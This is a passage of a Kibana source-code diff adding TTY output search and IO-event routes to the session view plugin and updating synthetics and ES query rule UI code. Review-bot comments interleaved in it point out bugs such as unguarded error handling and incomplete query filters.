@@ -0,0 +1,97 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React, { useEffect, useMemo, useState, useCallback } from 'react'; +import { SessionViewSearchBar } from '../session_view_search_bar'; +import { IOLine } from '../../../common/types/process_tree'; + +interface SearchResult { + line: IOLine; + match: string; + index: number; +} + +export interface TTYSearchBarDeps { + lines: IOLine[]; + seekToLine(index: number): void; + xTermSearchFn(query: string, index: number): void; +} + +export const TTYSearchBar = ({ lines, seekToLine, xTermSearchFn }: TTYSearchBarDeps) => { + const [currentMatch, setCurrentMatch] = useState(null); + const [searchQuery, setSearchQuery] = useState(''); + + useEffect(() => { + if (currentMatch) { + const goToLine = lines.indexOf(currentMatch.line); + seekToLine(goToLine); + } + + const timeout = setTimeout(() => { + return xTermSearchFn(searchQuery, currentMatch?.index || 0); + }, 100); + + return () => { + clearTimeout(timeout); + }; + }, [currentMatch, searchQuery, lines, xTermSearchFn, seekToLine]); + + const searchResults = useMemo(() => { + if (searchQuery) { + const matches: SearchResult[] = []; + + lines.reduce((previous: SearchResult[], current: IOLine) => { + if (current.value) { + const regex = new RegExp(searchQuery.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'), 'ig'); + const lineMatches = current.value.matchAll(regex); + if (lineMatches) { + for (const match of lineMatches) { + previous.push({ line: current, match: match[0], index: match.index || 0 }); + } + } + } + + return previous; + }, matches); + + if (matches.length > 0) { + setCurrentMatch(matches[0]); + } else { + setCurrentMatch(null); + } + + return matches; + } + + return []; + }, [searchQuery, lines]); + + const onSearch = useCallback((query) => { 
+ setSearchQuery(query); + setCurrentMatch(null); + }, []); + + const onSetCurrentMatch = useCallback( + (index) => { + const match = searchResults[index]; + + if (match && currentMatch !== match) { + setCurrentMatch(match); + } + }, + [currentMatch, searchResults] + ); + + return ( + + ); +}; diff --git a/x-pack/plugins/session_view/public/types.ts b/x-pack/plugins/session_view/public/types.ts index f8a42c0c4660c..d276f0e9518a9 100644 --- a/x-pack/plugins/session_view/public/types.ts +++ b/x-pack/plugins/session_view/public/types.ts @@ -107,15 +107,15 @@ export interface DetailPanelOrchestrator { name: string; type: string; ip: string; + parent: { + type: string; + }; }; namespace: string; cluster: { name: string; id: string; }; - parent: { - type: string; - }; } export interface DetailPanelCloud { diff --git a/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts b/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts new file mode 100644 index 0000000000000..c7371e05d058c --- /dev/null +++ b/x-pack/plugins/session_view/server/routes/get_total_io_bytes_route.ts 
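Review bot: `searchResults` calls `setCurrentMatch` from inside `useMemo`, i.e. a state update as a side effect of a memoised computation; React gives no guarantee when (or how often, under StrictMode) that callback runs, so selecting the first match belongs in a `useEffect` keyed on `searchResults`, or `currentMatch` should be derived from `searchResults[currentIndex]`. The `new RegExp(escaped, 'ig')` is also rebuilt for every line inside the reduce; hoist it above the loop (`matchAll` clones the regex, so reuse is safe) while keeping the metacharacter escaping, which is what stops user input from being interpreted as a pattern. `lines.reduce` is used purely for its side effect here — `lines.forEach` says what is meant.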
@@ -0,0 +1,65 @@ +/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { schema } from '@kbn/config-schema'; +import { IRouter } from '@kbn/core/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; +import { + GET_TOTAL_IO_BYTES_ROUTE, + PROCESS_EVENTS_INDEX, + ENTRY_SESSION_ENTITY_ID_PROPERTY, + TOTAL_BYTES_CAPTURED_PROPERTY, +} from '../../common/constants'; + +export const registerGetTotalIOBytesRoute = (router: IRouter) => { + router.get( + { + path: GET_TOTAL_IO_BYTES_ROUTE, + validate: { + query: schema.object({ + sessionEntityId: schema.string(), + }), + }, + }, + async (context, request, response) => { + const client = (await context.core).elasticsearch.client.asCurrentUser; + const { sessionEntityId } = request.query; + + try { + const search = await client.search({ + index: [PROCESS_EVENTS_INDEX], + body: { + query: { + bool: { + must: [ + { term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }, + { term: { [EVENT_ACTION]: 'text_output' } }, + ], + }, + }, + size: 0, + aggs: { + total_bytes_captured: { + sum: { + field: TOTAL_BYTES_CAPTURED_PROPERTY, + }, + }, + }, + }, + }); + + const agg: any = search.aggregations?.total_bytes_captured; + + return response.ok({ body: agg?.value || 0 }); + } catch (err) { + // unauthorized + if (err.meta.statusCode === 403) { + return response.ok(); + } + + return response.badRequest(err.message); + } + } + ); +}; diff --git a/x-pack/plugins/session_view/server/routes/index.ts b/x-pack/plugins/session_view/server/routes/index.ts index 2955ccdd39327..0e4099fe01cfa 100644 --- a/x-pack/plugins/session_view/server/routes/index.ts +++ b/x-pack/plugins/session_view/server/routes/index.ts 
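Review bot: The catch handler dereferences `err.meta.statusCode` without a guard, so an error that is not an Elasticsearch ResponseError (a connection failure, or anything thrown before the search) has no `meta` and the catch block itself throws, failing the request with an unhandled error instead of the intended response; use `err.meta?.statusCode`. A 403 is then turned into `response.ok()` with an empty body while the success path returns a bare number, so the client cannot distinguish "zero bytes" from "not authorized" and has to cope with two body shapes — return `response.ok({ body: 0 })` at minimum, or surface the forbidden status. Finally `response.badRequest(err.message)` labels every remaining failure a 400 and passes the raw ES message through; Kibana's response factory takes an options object (`{ body }`), so this probably sends the default text (please verify), and echoing raw backend errors to the browser is better replaced by logging the error server-side and returning a generic message.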
@@ -9,9 +9,13 @@ import { RuleRegistryPluginStartContract } from '@kbn/rule-registry-plugin/serve import { registerProcessEventsRoute } from './process_events_route'; import { registerAlertsRoute } from './alerts_route'; import { registerAlertStatusRoute } from './alert_status_route'; +import { registerIOEventsRoute } from './io_events_route'; +import { registerGetTotalIOBytesRoute } from './get_total_io_bytes_route'; export const registerRoutes = (router: IRouter, ruleRegistry: RuleRegistryPluginStartContract) => { registerProcessEventsRoute(router, ruleRegistry); registerAlertsRoute(router, ruleRegistry); registerAlertStatusRoute(router, ruleRegistry); + registerIOEventsRoute(router); + registerGetTotalIOBytesRoute(router); }; diff --git a/x-pack/plugins/session_view/server/routes/io_events_route.ts b/x-pack/plugins/session_view/server/routes/io_events_route.ts new file mode 100644 index 0000000000000..c03035a8b36a7 --- /dev/null +++ b/x-pack/plugins/session_view/server/routes/io_events_route.ts 
@@ -0,0 +1,66 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { schema } from '@kbn/config-schema'; +import { IRouter } from '@kbn/core/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; +import { + IO_EVENTS_ROUTE, + IO_EVENTS_PER_PAGE, + PROCESS_EVENTS_INDEX, + ENTRY_SESSION_ENTITY_ID_PROPERTY, +} from '../../common/constants'; + +export const registerIOEventsRoute = (router: IRouter) => { + router.get( + { + path: IO_EVENTS_ROUTE, + validate: { + query: schema.object({ + sessionEntityId: schema.string(), + cursor: schema.maybe(schema.string()), + }), + }, + }, + async (context, request, response) => { + const client = (await context.core).elasticsearch.client.asCurrentUser; + const { cursor } = request.query; + const { sessionEntityId } = request.query; + + try { + const search = await client.search({ + index: [PROCESS_EVENTS_INDEX], + body: { + query: { + bool: { + must: [ + { term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }, + { term: { [EVENT_ACTION]: 'text_output' } }, + ], + }, + }, + size: IO_EVENTS_PER_PAGE, + sort: [{ '@timestamp': 'asc' }], + search_after: cursor ? [cursor] : undefined, + }, + }); + + const events = search.hits.hits; + const total = + typeof search.hits.total === 'number' ? search.hits.total : search.hits.total?.value; + + return response.ok({ body: { total, events } }); + } catch (err) { + // unauthorized + if (err.meta.statusCode === 403) { + return response.ok({ body: { total: 0, events: [] } }); + } + + return response.badRequest(err.message); + } + } + ); +}; diff --git a/x-pack/plugins/session_view/server/routes/process_events_route.ts b/x-pack/plugins/session_view/server/routes/process_events_route.ts index 2bb1aa4579ec9..614c7ad135e73 100644 
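Review bot: Paging with `search_after: [cursor]` over a sort on `@timestamp` alone is lossy whenever several text_output events share the timestamp at a page boundary, because search_after resumes strictly after the sort value and the remaining equal-timestamp events are skipped. If equal timestamps can occur in this index, append a unique per-event field as a tiebreaker, e.g. `sort: [{ '@timestamp': 'asc' }, { '<TIEBREAK_FIELD>': 'asc' }]` (placeholder; pick a field that is unique per document), and carry both values in the cursor. The `err.meta.statusCode` access in the catch is unguarded here as well, as noted on get_total_io_bytes_route.ts.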
--- a/x-pack/plugins/session_view/server/routes/process_events_route.ts +++ b/x-pack/plugins/session_view/server/routes/process_events_route.ts @@ -12,6 +12,7 @@ import type { AlertsClient, RuleRegistryPluginStartContract, } from '@kbn/rule-registry-plugin/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; import { ALERTS_PER_PROCESS_EVENTS_PAGE, PROCESS_EVENTS_ROUTE, @@ -77,8 +78,13 @@ export const fetchEventsAndScopedAlerts = async ( index: [PROCESS_EVENTS_INDEX], body: { query: { - match: { - [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId, + bool: { + must: [{ term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }], + should: [ + { term: { [EVENT_ACTION]: 'fork' } }, + { term: { [EVENT_ACTION]: 'exec' } }, + { term: { [EVENT_ACTION]: 'end' } }, + ], }, }, size: PROCESS_EVENTS_PER_PAGE, diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx index e361c4d98bb77..e70a2988a324e 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx 
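Review bot: The new `bool` query puts the fork/exec/end terms under `should` next to a `must` clause without `minimum_should_match`, and in that shape Elasticsearch treats the `should` clauses as optional scoring hints, so the query still returns every event for the session (including text_output IO events) instead of only process lifecycle events. Either add `minimum_should_match: 1` to the `bool`, or move the restriction into `must` as `{ terms: { [EVENT_ACTION]: ['fork', 'exec', 'end'] } }`. The enclosing `fetchEventsAndScopedAlerts` starts and ends outside the hunk, so the page size and sort that follow are not visible here.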
@@ -23,18 +23,11 @@ import { useKibana } from '@kbn/kibana-react-plugin/public'; import { EsQueryAlertParams, SearchType } from '../types'; import { EsQueryExpression } from './es_query_expression'; -jest.mock('@kbn/kibana-react-plugin/public'); -jest.mock('@kbn/es-ui-shared-plugin/public', () => ({ - XJson: { - useXJsonMode: jest.fn().mockReturnValue({ - convertToJson: jest.fn(), - setXJson: jest.fn(), - xJson: jest.fn(), - }), - }, - // Mocking EuiCodeEditor, which uses React Ace under the hood +jest.mock('@kbn/kibana-react-plugin/public', () => ({ + useKibana: jest.fn(), + // Mocking CodeEditor // eslint-disable-next-line @typescript-eslint/no-explicit-any - EuiCodeEditor: (props: any) => ( + CodeEditor: (props: any) => ( ({ /> ), })); +jest.mock('@kbn/es-ui-shared-plugin/public', () => ({ + XJson: { + useXJsonMode: jest.fn().mockReturnValue({ + convertToJson: jest.fn(), + setXJson: jest.fn(), + xJson: jest.fn(), + }), + }, +})); jest.mock('@kbn/triggers-actions-ui-plugin/public', () => { const original = jest.requireActual('@kbn/triggers-actions-ui-plugin/public'); return { diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx index 6432ba9a324a8..380da4bea6d3a 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx 
@@ -10,14 +10,11 @@ import { lastValueFrom } from 'rxjs'; import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; -import { XJsonMode } from '@kbn/ace'; -import 'brace/theme/github'; - import { EuiFormRow, EuiLink, EuiSpacer, EuiTitle } from '@elastic/eui'; import { DocLinksStart, HttpSetup } from '@kbn/core/public'; -import { EuiCodeEditor, XJson } from '@kbn/es-ui-shared-plugin/public'; -import { useKibana } from '@kbn/kibana-react-plugin/public'; +import { XJson } from '@kbn/es-ui-shared-plugin/public'; +import { CodeEditor, useKibana } from '@kbn/kibana-react-plugin/public'; import { getFields, RuleTypeParamsExpressionProps } from '@kbn/triggers-actions-ui-plugin/public'; import { parseDuration } from '@kbn/alerting-plugin/common'; import { hasExpressionValidationErrors } from '../validation'; @@ -29,7 +26,6 @@ import { RuleCommonExpressions } from '../rule_common_expressions'; import { totalHitsToNumber } from '../test_query_row'; const { useXJsonMode } = XJson; -const xJsonMode = new XJsonMode(); interface KibanaDeps { http: HttpSetup; @@ -206,20 +202,28 @@ export const EsQueryExpression: React.FC< } > - { setXJson(xjson); setParam('esQuery', convertToJson(xjson)); }} + options={{ + ariaLabel: i18n.translate('xpack.stackAlerts.esQuery.ui.queryEditor', { + defaultMessage: 'Elasticsearch query editor', + }), + wordWrap: 'off', + tabSize: 2, + lineNumbers: 'off', + lineNumbersMinChars: 0, + folding: false, + lineDecorationsWidth: 0, + overviewRulerBorder: false, + }} /> diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx index e26bfb48ff8b5..94b396bc8ea3c 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx 
@@ -24,6 +24,24 @@ import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; import { act } from 'react-dom/test-utils'; import { ReactWrapper } from 'enzyme'; +jest.mock('@kbn/kibana-react-plugin/public', () => { + const original = jest.requireActual('@kbn/kibana-react-plugin/public'); + return { + ...original, + // Mocking CodeEditor + // eslint-disable-next-line @typescript-eslint/no-explicit-any + CodeEditor: (props: any) => ( + { + props.onChange(syntheticEvent.jsonString); + }} + /> + ), + }; +}); + const defaultEsQueryRuleParams: EsQueryAlertParams = { size: 100, thresholdComparator: '>', @@ -188,7 +206,7 @@ describe('EsQueryAlertTypeExpression', () => { wrapper = await wrapper.update(); expect(findTestSubject(wrapper, 'queryFormTypeChooserTitle').exists()).toBeFalsy(); - expect(findTestSubject(wrapper, 'queryJsonEditor').exists()).toBeTruthy(); + expect(wrapper.exists('[data-test-subj="queryJsonEditor"]')).toBeTruthy(); expect(findTestSubject(wrapper, 'selectIndexExpression').exists()).toBeTruthy(); await act(async () => { diff --git a/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts b/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts index 098ad0530af8d..85b5adc8a2020 100644 --- a/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts +++ b/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts @@ -40,6 +40,7 @@ const alertFactory = (contextKeys: unknown[], testAlertActionArr: unknown[]) => ); return alertInstance; }, + hasReachedAlertLimit: () => false, done: () => ({ getRecoveredAlerts: () => [] }), }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts b/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts index f2504e690965f..ce19d8442d056 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts 
+++ b/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts @@ -43,7 +43,6 @@ journey('DefaultEmailSettings', async ({ page, params }) => { }); step('clear existing settings', async () => { - await settings.dismissSyntheticsCallout(); await page.waitForSelector(byTestId('"default-connectors-input-loaded"')); await page.waitForTimeout(10 * 1000); const toEmailInput = await page.$(byTestId('toEmailAddressInput')); diff --git a/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts index 1193409d0df94..ba62da5d4a4d7 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts @@ -30,7 +30,6 @@ journey('StepsDuration', async ({ page, params }) => { }); step('Go to monitor details', async () => { - await page.click('text=Dismiss'); await page.click('button:has-text("test-monitor - inline")'); expect(page.url()).toBe(`${baseUrl}/monitor/dGVzdC1tb25pdG9yLWlubGluZQ==/?${queryParams}`); }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts index 40035e9c70923..2d9f1f888a936 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts @@ -46,8 +46,4 @@ journey(`Getting Started Page`, async ({ page, params }: { page: Page; params: a await createBasicMonitor(); await syntheticsApp.confirmAndSave(); }); - - step('it navigates to details page after saving', async () => { - await page.click('text=Dismiss'); - }); }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts index 5896b609cf76d..15cca32983e1d 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts 
+++ b/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts @@ -28,12 +28,6 @@ journey('uptime', ({ page, params }) => { await page.click('[data-test-subj=loginSubmit]'); }); - step('dismiss synthetics notice', async () => { - await page.click('[data-test-subj=uptimeDismissSyntheticsCallout]', { - timeout: 60 * 1000, - }); - }); - step('change uptime index pattern', async () => { await page.click(byTestId('settings-page-link')); diff --git a/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx b/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx index 024609e2f69ef..74fa8f6c8ce54 100644 --- a/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx +++ b/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx @@ -19,12 +19,6 @@ export function utilsPageProvider({ page }: { page: Page }) { } }, - async dismissSyntheticsCallout() { - await page.click('[data-test-subj=uptimeDismissSyntheticsCallout]', { - timeout: 60 * 1000, - }); - }, - async assertText({ text }: { text: string }) { await page.waitForSelector(`text=${text}`); expect(await page.$(`text=${text}`)).toBeTruthy(); diff --git a/x-pack/plugins/synthetics/kibana.json b/x-pack/plugins/synthetics/kibana.json index 9597d05a44229..f6d30abeb4000 100644 --- a/x-pack/plugins/synthetics/kibana.json +++ b/x-pack/plugins/synthetics/kibana.json @@ -21,7 +21,8 @@ "triggersActionsUi", "usageCollection", "unifiedSearch", - "spaces" + "spaces", + "bfetch" ], "server": true, "ui": true, diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts b/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts index af51f39786898..64d72aa248d78 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts +++ b/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts 
@@ -9,12 +9,12 @@ import { i18n } from '@kbn/i18n'; import { useContext } from 'react'; import { useSelector } from 'react-redux'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import { UptimeSettingsContext } from '../contexts'; import { ClientPluginsStart } from '../../plugin'; import { indexStatusSelector } from '../state/selectors'; -export function useNoDataConfig(): KibanaPageTemplateProps['noDataConfig'] { +export function useNoDataConfig(): NoDataConfig | undefined { const { basePath } = useContext(UptimeSettingsContext); const { diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx index e4e55b96f09dc..f9a02507f5ec3 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx @@ -251,9 +251,7 @@ describe('', () => { expect(node).toBeInTheDocument(); }); expect( - getByText( - /To create a "Browser" monitor, please ensure you are using the elastic-agent-complete Docker container, which contains the dependencies to run these mon/ - ) + getByText(/To create a "Browser" monitor, please ensure you are using the/) ).toBeInTheDocument(); // expect tls options to be available for browser diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx index 1d6c2a085ec68..e600c8067cc9a 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx 
@@ -16,6 +16,7 @@ import { EuiSpacer, EuiSwitch, EuiCallOut, + EuiCode, EuiLink, } from '@elastic/eui'; import { DescribedFormGroupWithWrap } from './common/described_form_group_with_wrap'; @@ -154,27 +155,32 @@ export const CustomFields = memo( - - - ), - }} + id="xpack.synthetics.createPackagePolicy.stepConfigure.monitorIntegrationSettingsSection.monitorType.browser.warning.title" + defaultMessage="Requirement" /> } - iconType="help" size="s" - /> + > + elastic-agent-complete, + link: ( + + + + ), + }} + /> + )} {renderSimpleFields(monitorType)} diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx index f49bbf10a9afc..d1d9eb03c01f6 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx @@ -15,7 +15,6 @@ import { EuiFlyoutBody, EuiFlyoutFooter, EuiFlyoutHeader, - EuiSpacer, EuiTitle, EuiFlyout, EuiButton, @@ -77,8 +76,6 @@ export const AddLocationFlyout = ({

{NEED_FLEET_READ_AGENT_POLICIES_PERMISSION}

)} - - diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx index 67e6a29ea936f..d30dcb2d7db42 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx @@ -26,10 +26,11 @@ export const EmptyLocations = ({ {ADD_FIRST_LOCATION}} + titleSize="s" body={ -

+ {!inFlyout ? FIRST_MONITOR : ''} {START_ADDING_LOCATIONS_DESCRIPTION} -

+ } actions={ {LEARN_MORE}{' '} - + {READ_DOCS} diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx index 8985a5e0a09ee..a15629a99e3d9 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx @@ -5,7 +5,16 @@ * 2.0. */ import React from 'react'; -import { EuiFieldText, EuiForm, EuiFormRow, EuiSpacer } from '@elastic/eui'; +import { FormattedMessage } from '@kbn/i18n-react'; +import { + EuiFieldText, + EuiForm, + EuiFormRow, + EuiSpacer, + EuiCallOut, + EuiCode, + EuiLink, +} from '@elastic/eui'; import { useSelector } from 'react-redux'; import { i18n } from '@kbn/i18n'; import { useFormContext, useFormState } from 'react-hook-form'; @@ -52,11 +61,44 @@ export const LocationForm = ({ + + +

+ { + elastic-agent-complete, + link: ( + + + + ), + }} + /> + } +

+
); }; +export const AGENT_CALLOUT_TITLE = i18n.translate( + 'xpack.synthetics.monitorManagement.agentCallout.title', + { + defaultMessage: 'Requirement', + } +); + export const LOCATION_NAME_LABEL = i18n.translate( 'xpack.synthetics.monitorManagement.locationName', { diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx index fc8f7d9b1c2f0..103a9a37480db 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx @@ -78,7 +78,7 @@ export const ManageLocationsFlyout = () => { const flyout = ( - +

{PRIVATE_LOCATIONS}

diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx index 7188a896ef4b5..7a1d59e611e6b 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx @@ -91,7 +91,7 @@ export const PolicyHostsField = ({ @@ -126,6 +126,13 @@ const SELECT_POLICY_HOSTS = i18n.translate('xpack.synthetics.monitorManagement.s defaultMessage: 'Select agent policy', }); +const SELECT_POLICY_HOSTS_HELP_TEXT = i18n.translate( + 'xpack.synthetics.monitorManagement.selectPolicyHost.helpText', + { + defaultMessage: 'We recommend using a single Elastic agent per agent policy.', + } +); + const POLICY_HOST_LABEL = i18n.translate('xpack.synthetics.monitorManagement.policyHost', { defaultMessage: 'Agent policy', }); diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx index 2236b122459ca..425d881e0141e 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx @@ -82,7 +82,7 @@ export const TEST_NOW_AVAILABLE_LABEL = i18n.translate( export const PRIVATE_AVAILABLE_LABEL = i18n.translate( 'xpack.synthetics.monitorList.testNow.available.private', { - defaultMessage: 'For now, Test now is disabled for private locations monitors.', + defaultMessage: `You can't currently test monitors running on private locations on demand.`, } ); 
diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx deleted file mode 100644 index d5b82a562be3b..0000000000000 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { shallowWithIntl } from '@kbn/test-jest-helpers'; -import React from 'react'; -import { SyntheticsCallout } from './synthetics_callout'; - -describe('SyntheticsCallout', () => { - let setItemMock; - let localStorageMock: any; - - beforeEach(() => { - setItemMock = jest.fn(); - localStorageMock = { - getItem: jest.fn().mockImplementation(() => null), - setItem: setItemMock, - }; - - global.localStorage = localStorageMock; - }); - - it('renders component if dismissal flag is unset', () => { - expect(shallowWithIntl()).toMatchInlineSnapshot(` - - -

- -

- - - - - - - - - - - - -
-
- `); - }); - - it('returns null if callout has been dismissed', () => { - localStorageMock.getItem = jest.fn().mockImplementation(() => 'true'); - expect(shallowWithIntl()).toEqual({}); - }); - - it('renders the component, and then returns null when dismiss button clicked', () => { - localStorageMock.getItem = jest - .fn() - .mockImplementationOnce(() => null) - .mockImplementationOnce(() => 'true'); - const wrapper = shallowWithIntl(); - expect(wrapper).toMatchInlineSnapshot(` - - -

- -

- - - - - - - - - - - - -
-
- `); - wrapper.find('EuiButton').simulate('click'); - expect(wrapper).toEqual({}); - }); -}); diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx deleted file mode 100644 index a6c4f06d31c27..0000000000000 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { EuiButton, EuiButtonEmpty, EuiCallOut, EuiFlexGroup, EuiFlexItem } from '@elastic/eui'; -import React, { useState } from 'react'; -import { i18n } from '@kbn/i18n'; -import { FormattedMessage } from '@kbn/i18n-react'; - -const SYNTHETICS_CALLOUT_LS_KEY = 'xpack.uptime.syntheticsCallout.display'; -const shouldShowSyntheticsCallout = () => { - let value = localStorage.getItem(SYNTHETICS_CALLOUT_LS_KEY); - if (value === null) { - localStorage.setItem(SYNTHETICS_CALLOUT_LS_KEY, 'true'); - value = 'true'; - } - return value === 'true'; -}; -const hideSyntheticsCallout = () => 